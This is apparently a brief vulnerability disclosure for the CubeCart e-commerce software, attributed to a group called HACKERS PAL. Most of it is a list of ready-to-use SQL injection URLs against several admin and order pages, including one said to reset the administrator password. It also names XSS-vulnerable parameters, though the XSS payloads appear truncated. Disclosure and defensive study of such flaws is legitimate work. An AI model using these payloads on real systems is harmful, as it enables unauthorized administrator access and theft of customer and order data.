Hello,,
CubeCart Multiple input Validation vulnerabilities
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
Sql injection
admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
it will reset the password for the administrator
--
admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
xss
admin/print_order.php?order_id=
--
view_order.php?order_id=
--
admin/nav.php?site_url=">